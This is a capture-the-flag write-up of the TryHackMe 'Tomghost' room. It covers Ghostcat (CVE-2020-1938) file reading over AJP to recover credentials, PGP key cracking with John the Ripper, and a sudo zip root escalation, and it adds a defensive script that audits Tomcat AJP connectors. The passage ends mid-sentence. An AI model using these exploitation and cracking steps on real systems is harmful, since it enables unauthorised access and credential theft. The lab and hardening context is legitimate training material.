In this post, we will look into the room “Tomghost” from TryHackMe, which can be found at https://tryhackme.com
The first step is to enumerate the machine. A simple nmap scan will do it:
nmap -Pn -sV --script vulners <IP>

Nmap scan report for 10.10.170.7
Host is up (0.055s latency).
PORT     STATE SERVICE    VERSION
22/tcp   open  ssh        OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
53/tcp   open  tcpwrapped
8009/tcp open  ajp13      Apache Jserv (Protocol v1.3)
8080/tcp open  http       Apache Tomcat 9.0.30
| vulners:
|   cpe:/a:apache:tomcat:9.0.30:
|_    CVE-2020-1938  7.5  https://vulners.com/cve/CVE-2020-1938
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Step 2 – Web Exploitation
From the Nmap scan above, we can see that the box is flagged as vulnerable to CVE-2020-1938 (“Ghostcat”), which affects the AJP connector on port 8009. A quick search confirms that this version of Apache Tomcat is vulnerable to file reading/inclusion through AJP. The following exploit lets us read files from the web application, which may contain sensitive information such as login credentials.
Download the exploit and run it with:
python 48143.py <IP>
You should see a similar output:
Getting resource at ajp13://<IP>/asdf
----------------------------
<?xml version="1.0" encoding="UTF-8"?>
<!--
  Licensed to the Apache Software Foundation (ASF) under one or more
  contributor license agreements.  See the NOTICE file distributed with
  this work for additional information regarding copyright ownership.
  The ASF licenses this file to You under the Apache License, Version 2.0
  (the "License"); you may not use this file except in compliance with
  the License.  You may obtain a copy of the License at

      http://www.apache.org/licenses/LICENSE-2.0

  Unless required by applicable law or agreed to in writing, software
  distributed under the License is distributed on an "AS IS" BASIS,
  WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
  See the License for the specific language governing permissions and
  limitations under the License.
-->
<web-app xmlns="http://xmlns.jcp.org/xml/ns/javaee"
  xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
  xsi:schemaLocation="http://xmlns.jcp.org/xml/ns/javaee
                      http://xmlns.jcp.org/xml/ns/javaee/web-app_4_0.xsd"
  version="4.0"
  metadata-complete="true">

  <display-name>Welcome to Tomcat</display-name>
  <description>
     Welcome to GhostCat
       [USERNAME:PASSWORD]
  </description>

</web-app>
The credentials are in the description element at the end of the output.
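The reason the exploit works is that Tomcat 9.0.30 exposes its AJP connector on every interface with no shared secret. A small audit script, added here as an example and not part of the original write-up, checks a Tomcat server.xml for exactly that condition and shows a hardened connector beside the weak one (the Tomcat 9.0.31+ defaults: bind to loopback and require a secret). The server.xml snippets are constructed, and the secret value is a placeholder.

```python
"""Audit a Tomcat server.xml for AJP connectors exposed the way Ghostcat
(CVE-2020-1938) needs them: reachable on all interfaces and without a
shared secret.  Sample server.xml fragments below are constructed."""
import xml.etree.ElementTree as ET
from typing import List


def audit_ajp_connectors(server_xml: str) -> List[str]:
    """Return one finding per weak AJP <Connector>; an empty list means none flagged."""
    findings = []
    root = ET.fromstring(server_xml)
    for conn in root.iter("Connector"):
        if not conn.get("protocol", "").upper().startswith("AJP"):
            continue  # HTTP connectors are not affected by Ghostcat
        port = conn.get("port", "?")
        # Pre-9.0.31 builds listen on every interface when address is absent.
        addr = conn.get("address")
        if addr is None or addr in ("0.0.0.0", "::"):
            findings.append(f'AJP port {port}: bound to all interfaces (set address="127.0.0.1")')
        if conn.get("secretRequired", "true").lower() == "false":
            findings.append(f'AJP port {port}: secretRequired="false" accepts any AJP client')
        elif not conn.get("secret"):
            findings.append(f"AJP port {port}: no shared secret configured")
    return findings


# Constructed: the default Tomcat 9.0.30-style connector that Ghostcat abuses.
WEAK = """<Server><Service name="Catalina">
  <Connector port="8080" protocol="HTTP/1.1" redirectPort="8443"/>
  <Connector port="8009" protocol="AJP/1.3" redirectPort="8443"/>
</Service></Server>"""

# Constructed: loopback-only, secret required (placeholder secret value).
HARDENED = """<Server><Service name="Catalina">
  <Connector port="8080" protocol="HTTP/1.1" redirectPort="8443"/>
  <Connector port="8009" protocol="AJP/1.3" redirectPort="8443"
             address="127.0.0.1" secretRequired="true"
             secret="REPLACE-WITH-A-LONG-RANDOM-SECRET"/>
</Service></Server>"""

if __name__ == "__main__":
    for name, cfg in (("weak", WEAK), ("hardened", HARDENED)):
        print(name, audit_ajp_connectors(cfg) or ["ok"])
```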
Step 3 – User.txt
Use the recovered credentials to log into the machine via ssh.
After that, you can immediately get user.txt by browsing to /home and visiting another user’s directory.
Step 4 – Horizontal privilege escalation
Go back to the initial user’s home folder and take a look at what is there. We can see exactly two files: credential.pgp and tryhackme.asc. As we can easily guess, those files will reveal some credentials to us (most likely for the second user).
A simple Google search on PGP cracking led me to this article. This short guide tells us to crack the .asc file with John the Ripper and then use the recovered passphrase to open the PGP file.
Let’s first convert the .asc file into a format John understands by running:
gpg2john tryhackme.asc > hash
Then all we need to do is run a rockyou-powered cracking process on the hash file:
john hash --wordlist=/usr/share/wordlists/rockyou.txt
A password is revealed in a couple of seconds and we can finally use it to open the .pgp file. First import the key, then run the decryption command and enter the password when prompted:
gpg --import tryhackme.asc
You can now easily open the PGP file after importing the key.
gpg --decrypt credential.pgp
Bingo! We got the credentials. Now let’s ssh into the box as that user and enumerate there.
Step 5 – Root
sudo -l reveals that we can run /usr/bin/zip as sudo. This configuration is relatively well known and is covered by GTFOBins.
Let’s follow the guide from GTFO and get the root shell!
Done! We now have root access and can finally read the